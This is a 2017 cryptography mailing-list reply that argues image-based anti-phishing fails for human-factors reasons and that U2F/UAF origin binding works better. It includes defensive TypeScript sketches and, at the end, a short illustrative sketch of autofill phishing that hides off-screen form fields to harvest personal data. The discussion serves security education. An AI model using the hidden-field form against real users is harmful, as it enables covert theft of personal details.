[Cryptography] [FORGED] Re: So please tell me. Why is my solution wrong?

Natanael natanael.l at gmail.com
Tue Feb 14 18:54:25 EST 2017


On 14 Feb 2017 21:08, "Joseph Kilcullen" <kilcullenj at gmail.com> wrote:

> On 13-Feb-17 3:29 PM, Theodore Ts'o wrote:

>>
>> The above is something which *is* applicable to your solution.  If you
>> don't believe it, or believe that your solution is somehow special,
>> you are welcome to bankroll some human factors lab to do a study
>> specific to your design...
>>

> True, but I figured people who understand cryptography should 'get it' that
> it's just a shared secret.


We get it. But many of us know it isn't enough, which is why we skipped
straight to explaining why it isn't enough.

HCISec is the relevant field of study: human-computer interaction, focused
on security.

> Since the image is shared between 'your web browser' and 'you', a MITM
> attack would involve the criminal standing between you and your computer
> monitor!! I'm sure this happens, but it's not called a phishing attack.


Shoulder surfing. Or perhaps just abusing the graphics card to steal the
image buffer?

http://slashdot.org/story/305073

http://ieeexplore.ieee.org/document/6956554/

> With my solution a MITM attack must remove TLS entirely or substitute a new
> TLS certificate. Either way the user, or your browser, will see something
> is happening. The login window won't appear if TLS is missing. If a new
> certificate is used, then whose identity or CA will be used in it? The
> computer user will see the fake identity named on the login window.


But they won't. They typically don't notice and don't know what to look
for.

https://en.wikipedia.org/wiki/Change_blindness

https://arstechnica.com/security/2015/03/mris-show-our-brains-shutting-down-when-we-see-security-prompts/

And phishing works because people slip up. People forget. People become
tired.

http://ieeexplore.ieee.org/abstract/document/6894474/

http://www.usablesecurity.org//emperor/

https://www.schneier.com/blog/archives/2016/10/security_design.html

https://www.internetsociety.org/doc/neural-signatures-user-centered-security-fmri-study-phishing-and-malware-warnings

Oh, and did anybody mention dyslexics yet?

> Right now users look for a picture of a padlock! If pictures of padlocks
> are proper cryptographic authentication mechanisms, then find me a book, or
> paper, which documents this cryptographic authentication mechanism. Or an
> army which uses this tea-leaf-reading level of cryptography!


It has the same practical effect if it has a protected UI surface to render
in, such as when the URL bar can't be hidden.

The custom image just doesn't beat a custom color theme, in particular
since it would be shared across everything you do.

As previously explained, the names will never be more meaningful than the
domain name itself. There's no practical chance you'll recognize the
organization name as fake if you didn't react to the domain name.

The image has no effect on security. There's nothing it does that you
can't achieve with better URL domain highlighting (perhaps again with a
unique color scheme, to prevent forgery?). The image just says "read this
name and see if it is right", which we already know doesn't work.

It also does nothing meaningful to protect you if you share the raw
password with the site anyway: the presence of a unique personal image
does not help if you have already failed to identify the domain as fake.
The site will get your password anyway.

---

Muscle memory is infinitely more reliable than depending on awareness and
recognition. Make it mentally expensive to do the wrong thing and cheap to
do the right thing!

U2F / UAF, which binds to both the domain name / certificate and the TLS
session, is infinitely more effective. You just can't get it wrong!
You may call this complexity, but it is the right kind of complexity, the
kind that helps us. It is already implemented and it works. The design is
fairly simple too! It doesn't change anything beyond requiring a small
addition to the browser and the server. It doesn't modify the TLS protocol,
CA behavior, or certificates; it uses them as they already are.

Using it means that *you authenticate to the browser* and not to the server
(there's your shared secret!), while the browser securely authenticates to
the server on your behalf (based on which server it is talking to).
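
To make the origin binding concrete, here is a minimal TypeScript sketch of
a browser-mediated login. It assumes a WebAuthn-style API
(navigator.credentials.get); the U2F JavaScript API of the day differs in
names but not in the idea, and fetchChallenge / sendAssertion are made-up
helpers standing in for ordinary requests to the server.

declare function fetchChallenge(): Promise<BufferSource>; // hypothetical server call
declare function sendAssertion(body: {
  clientDataJSON: ArrayBuffer;
  authenticatorData: ArrayBuffer;
  signature: ArrayBuffer;
}): Promise<void>; // hypothetical server call

async function loginWithSecurityKey(credentialId: BufferSource): Promise<void> {
  // 1. The server issues a fresh random challenge for this session.
  const challenge = await fetchChallenge();

  // 2. The browser asks the authenticator to sign the challenge. The signed
  //    client data includes the page's origin, so an assertion produced on a
  //    phishing domain will not verify at the real site.
  const assertion = (await navigator.credentials.get({
    publicKey: {
      challenge,
      allowCredentials: [{ type: "public-key", id: credentialId }],
      timeout: 60_000,
    },
  })) as PublicKeyCredential;

  const response = assertion.response as AuthenticatorAssertionResponse;

  // 3. Send the signed assertion back. The server checks the signature, that
  //    the challenge matches, and that clientDataJSON names the server's own
  //    origin. The user never typed anything a phisher could reuse.
  await sendAssertion({
    clientDataJSON: response.clientDataJSON,
    authenticatorData: response.authenticatorData,
    signature: response.signature,
  });
}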

Forcing users to choose and remember images and always pay attention is a
UX complexity that will fail.

And forcing a change in CA policies will fail: there are over 600
intermediate CAs that would all need to cooperate, as well as all the
browsers!


Trusted inputs simply beat automatic prompts and forced awareness. To
people, logins are just like security warnings: something to quickly get
past. So let's not give control over them to untrusted parties.

As I said before, requiring that the user use a secure input to initiate
the interaction / login process would be infinitely more secure.

By using, for example, a key combo (or a button on a hardware security
token) that can't be intercepted or faked, in combination with an
authentication protocol that can't be phished (like U2F / UAF), you train
the user to only trust prompts they intentionally triggered, and you
simultaneously help prevent unwanted authentication or authorization of
anything they didn't intend (like accidentally approving a bank transfer).
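
To illustrate the "can't be intercepted or faked" part on the verifying
side, here is a short TypeScript sketch. It assumes the FIDO2 / WebAuthn
authenticatorData layout (rpIdHash, then a flags byte, then the signature
counter); the function name is made up. The point is that the server can
refuse any assertion the token produced without a physical touch:

// authenticatorData = rpIdHash (32 bytes) || flags (1 byte) || signCount (4 bytes) || ...
const FLAGS_OFFSET = 32;
const USER_PRESENT = 0x01; // bit 0 of the flags byte: a user-presence test passed

function assertUserWasPresent(authenticatorData: Uint8Array): void {
  if (authenticatorData.length < FLAGS_OFFSET + 1) {
    throw new Error("authenticatorData too short");
  }
  if ((authenticatorData[FLAGS_OFFSET] & USER_PRESENT) === 0) {
    // No button press on the token: a silent, scripted approval of something
    // the user never intended is rejected here.
    throw new Error("authenticator did not report a user-presence test");
  }
}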

It not only blocks phishing and keeps the password protected from nosy
colleagues, it also provides a defense against, for example, XSS attacks
(as do other 2FA methods) and against exploits of password autofill:

https://github.com/anttiviljami/browser-autofill-phishing

https://www.theguardian.com/technology/2017/jan/10/browser-autofill-used-to-steal-personal-details-in-new-phising-attack-chrome-safari
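
For context, the links above describe hidden-field autofill abuse. What
follows is only a rough TypeScript/DOM sketch of that general technique
(not the linked demo's actual code): the page shows one innocuous field
while quietly adding off-screen fields that some browsers will fill in from
the saved profile.

function buildAutofillPhishingForm(): HTMLFormElement {
  const form = document.createElement("form");

  // The only field the victim sees and thinks they are submitting.
  const visible = document.createElement("input");
  visible.name = "email";
  visible.setAttribute("autocomplete", "email");
  form.appendChild(visible);

  // Off-screen fields that autofill may populate without the victim noticing.
  for (const kind of ["name", "tel", "street-address", "postal-code"]) {
    const hidden = document.createElement("input");
    hidden.name = kind;
    hidden.setAttribute("autocomplete", kind);
    hidden.style.position = "absolute";
    hidden.style.left = "-9999px"; // still rendered, so autofill applies, but off-screen
    form.appendChild(hidden);
  }
  return form;
}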